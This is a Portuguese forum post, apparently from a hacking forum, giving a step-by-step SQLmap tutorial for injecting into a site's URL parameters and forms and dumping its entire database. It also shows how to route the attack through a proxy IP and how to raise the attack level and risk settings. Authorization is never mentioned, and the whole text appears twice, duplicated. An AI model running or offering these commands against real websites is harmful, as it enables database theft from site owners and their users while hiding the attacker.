Como fazer funcionar:
Na vez que conheci esse programinha básico, tive dificuldade pra executá-lo no Windows, então vai essa dica. SQLmap 0.9 roda no windows e linux com python instalado (atenção usem python 2.6 senão não funciona) caso tenha python posterior, instale o 2.6 em outra pasta, e rode-o com o parâmetro contendo o diretório do sqlmap.py, ex:
no terminal:
c:\python26\python.exe "c:\sqlmap\sqlmap.py" (caso tenha algum python mais novo instalado).
Caso só tenha o python 2.6 instalado, só joga o .py direto no terminal que funciona, ex:
"c:\sqlmap\sqlmap.py"
Use -h para ver demais comandos, ex: "c:\sqlmap\sqlmap.py" -h ou: c:\python26\python.exe "c:\sqlmap\sqlmap.py"(caso tenha vários pythons instalados).
Fazer Injection em variável de link (GET):
"c:\sqlmap\sqlmap.py" --url="http://siteexemplo.com.br/index.php?id=25" --current-db --tables –dump-all
Isso ja extrai tudo que for possível da database, mais prático assim.
Fazer Injeção em formulário (POST):
"c:\sqlmap\sqlmap.py" --url="http://siteexemplo.com.br/index.php?id=25" --forms --current-db --tables –dump-all
o parâmetro "--forms" vai fazer o SQLmap escânear a página html e procurar os formulários contidos nela (podem ser formulários de busca, enfim, todo tipo de input, combobox, checkbox, list, radio, text). o SQLmap vai te perguntar qual formulário você deseja usar (caso exista mais de um na mesma página). A galera esquece que dá pra fazer injection em radio buttons, checkbox e etc.
Para usar proxy:
Usa-se o parâmetro '--proxy="http://xxx.xxx.xxx.xxx:xx" ' para ativar o seu uso, ex:
"c:\sqlmap\sqlmap.py" --url="http://siteexemplo.com.br/index.php?id=25" --proxy="http://200.156.35.2:3128" --current-db --tables –dump-all
Para aumentar poder de injeção:
Use os parâmetros "--level=x" onde x é igual a um numero inteiro de intensidade que pode ser de 1 a 5, e 5 é maior poder, 1 menor poder. Use o parâmetro "--risk=x" (onde x é igual a um numero de 1 a 3) para definir maior apelação, que torna mais arriscado-claro, ex:
"c:\sqlmap\sqlmap.py" --url="http://siteexemplo.com.br/index.php?id=25" --level=5 --risk=3--current-db --tables –dump-all
Tela do programa:
Resultados:
Os resultados da varredura ficarão na pasta ./output/nome_do_site_injetado/
fonte: eu mesmo
Para saber outros detalhes sobre o sql map, tem o post do prT's:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Na vez que conheci esse programinha básico, tive dificuldade pra executá-lo no Windows, então vai essa dica. SQLmap 0.9 roda no windows e linux com python instalado (atenção usem python 2.6 senão não funciona) caso tenha python posterior, instale o 2.6 em outra pasta, e rode-o com o parâmetro contendo o diretório do sqlmap.py, ex:
no terminal:
c:\python26\python.exe "c:\sqlmap\sqlmap.py" (caso tenha algum python mais novo instalado).
Caso só tenha o python 2.6 instalado, só joga o .py direto no terminal que funciona, ex:
"c:\sqlmap\sqlmap.py"
Use -h para ver demais comandos, ex: "c:\sqlmap\sqlmap.py" -h ou: c:\python26\python.exe "c:\sqlmap\sqlmap.py"(caso tenha vários pythons instalados).
Fazer Injection em variável de link (GET):
"c:\sqlmap\sqlmap.py" --url="http://siteexemplo.com.br/index.php?id=25" --current-db --tables –dump-all
Isso ja extrai tudo que for possível da database, mais prático assim.
Fazer Injeção em formulário (POST):
"c:\sqlmap\sqlmap.py" --url="http://siteexemplo.com.br/index.php?id=25" --forms --current-db --tables –dump-all
o parâmetro "--forms" vai fazer o SQLmap escânear a página html e procurar os formulários contidos nela (podem ser formulários de busca, enfim, todo tipo de input, combobox, checkbox, list, radio, text). o SQLmap vai te perguntar qual formulário você deseja usar (caso exista mais de um na mesma página). A galera esquece que dá pra fazer injection em radio buttons, checkbox e etc.
Para usar proxy:
Usa-se o parâmetro '--proxy="http://xxx.xxx.xxx.xxx:xx" ' para ativar o seu uso, ex:
"c:\sqlmap\sqlmap.py" --url="http://siteexemplo.com.br/index.php?id=25" --proxy="http://200.156.35.2:3128" --current-db --tables –dump-all
Para aumentar poder de injeção:
Use os parâmetros "--level=x" onde x é igual a um numero inteiro de intensidade que pode ser de 1 a 5, e 5 é maior poder, 1 menor poder. Use o parâmetro "--risk=x" (onde x é igual a um numero de 1 a 3) para definir maior apelação, que torna mais arriscado-claro, ex:
"c:\sqlmap\sqlmap.py" --url="http://siteexemplo.com.br/index.php?id=25" --level=5 --risk=3--current-db --tables –dump-all
Tela do programa:
Resultados:
Os resultados da varredura ficarão na pasta ./output/nome_do_site_injetado/
fonte: eu mesmo
Para saber outros detalhes sobre o sql map, tem o post do prT's:
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Apenas usuários registrados e ativados podem ver os links., Clique aqui para se cadastrar...
Comment